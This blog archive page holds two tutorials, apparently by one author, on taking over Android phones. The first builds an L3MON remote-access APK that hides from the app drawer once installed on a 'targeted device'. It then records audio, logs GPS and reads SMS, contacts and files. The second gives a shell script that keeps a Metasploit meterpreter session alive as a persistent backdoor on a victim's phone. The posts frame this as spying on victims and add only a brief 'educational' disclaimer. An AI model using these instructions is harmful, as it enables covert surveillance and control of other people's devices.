Archive for the ‘Android Tricks’ Category


cf3fc480-3d8c-11ea-831e-e9dbba8efbcb

L3MON is a remote Android management suite, we can use it to gain access on any android smartphone. In easy words, this is an Android RAT (Remote Administrative Tool).

In today’s detailed tutorial we learn how to install & configure L3MON on our Kali Linux system and use it.

Using L3MON we can make an Android APK payload and send it to android device and after installing it on the android device we can gain the access of Android device via L3MON’s web-based interface, we can send commands from the easy web-based interface and execute our commands on targeted devices.

L3mon has lots of beautiful features they are the following:

  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built-In APK Builder

  Installing L3MON in Kali Linux

We need Java Runtime Environment 8 and nodejs installed in our machine to run L3mon.

First, we install the JRE (Java Runtime Environment) on our system by applying the following command:

sudo apt-get install openjdk-8-jre 

This command will install JRE version 8 on our system as shown in the following screenshot.

installing JRE in Kali Linux
We already have installed JR

Then we need to install NodeJs on our system we apply the following commands to download nodejs in our system.

curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -

Then we run the following command to install it.

sudo apt-get install -y nodejs]

installing nodejs in Kali


Then we install pm2 process manager by using the following command:

sudo npm install pm2 -g
Now we are ready to install and configure L3MON.

We download it from it’s GitHub by using git clone command:

wget https://github.com/D3VL/L3MON/releases/download/1.1.2/L3MON-v1.1.2.zip

This command will download L3MON in our system. Now we create a new folder in our Desktop named L3MON and copy the downloaded zip file there.

Then extract it by right-clicking on the zip file and choose “extract here”.

unziping l3mon

Then we open a terminal window and navigate to L3MON in our Desktop by simply using cd command:

cd /Desktop/L3MON

Here we install all the dependencies by using the following command:

npm install
It will install the dependencies now as we can see the following screenshot:
 installing dependencies of l3mon

Let start the server by using the following command:

pm2 start index.js
starting the instance

Now we can see our server in our browser http://localhost:22533 there will be a login page as the following screenshot:

l3mon login

We create a login for our server here. But we can’t log in because we did not create a password to log in. To create a password we stop our service by using the following command:

pm2 stop index.js

Now we need to edit maindb.json file using our favourite text editor mousepad.

mousepad maindb.json

Here we edit the username if we want it. But in the password field, we need to give our password’s md5 hash. Means if we fill here the password as plain text, will not work. We just need to put the password’s md5 hash.

How to create a md5 hash of a password? Suppose our password is qwerty (This is for an example we shouldn’t choose easy passwords for security reasons). To convert it on md5 we need to use the following command in another terminal window.

echo -n "qwerty" | md5sum | cut -d" " -f 1

Here we got the MD5 hash of our password as we can see in the following screenshot.

creating md5 hash

Then we fill our username and password in maindb.json file then save and close this file.

modify and save the maindb.json file

Now we again start the server by using the following command :

pm2 start index.js

Then again open our localhost in browser with 22533 port.

As we set our username kali and password qwerty we fill it and click on login.

We are successfully logged in.

Now we are in control. We need to open the APK builder tab.

APK builder

Here we put our IP address (local or public) and leave the port as default and click on build.

Note: If we want to control android device on our local network (same WiFi) then we can use our local IP and to connect devices through the internet we need to put our Public IP (Static IP is preferred for a long time use).

After clicking on the build we got an error like this.

we got error

We solved this error by configuring JAVA in another terminal by running following command:

update-alternatives --config java

Then we type 2 and enter.
Then we restart our running L3MON server by using the following command:

pm2 restart all

Bingo, the error goes now the build is ready to download.

l3mon apk download

Now we can download the L3MON.apk in our system, and send it to our targeted device anyway and make a successful installation.

After successful installation, it on the targeted device and the phone user tries to open this L3MON will asks all the permission of devices and automatically hide from the app drawer.

After this, we got a connection with the device. We can check it on our Devices tab.

Now we can control this phone from the manage button. Here in the following screenshot, we are in the file manager of the phone. Now we can spy on this phone.

File manager accessing by L3MON
We are in the file manager of the victim device

Our downloaded data and recorded audio clips will be saved under assets/webpublic/client_downloads/ directory.

Our discussed method is for the local network. To connect a device from the internet we prefer to have a static IP address and forward our default port 22533 in our router settings or we can change the default port by changing these lines (inside includes/const.js).

Using this method we can control phones connected in our same network. We also can control devices through internet by using ngrok services. Configuring L3MON on VPS will make it portable and useful.

Disclaimer

Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial.
L3MON is built and our article is documented for both Educational and Internal use ONLY.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.


Hello guys, today we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to fewer permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the methods, there are a lot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into the same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In the above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in the same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)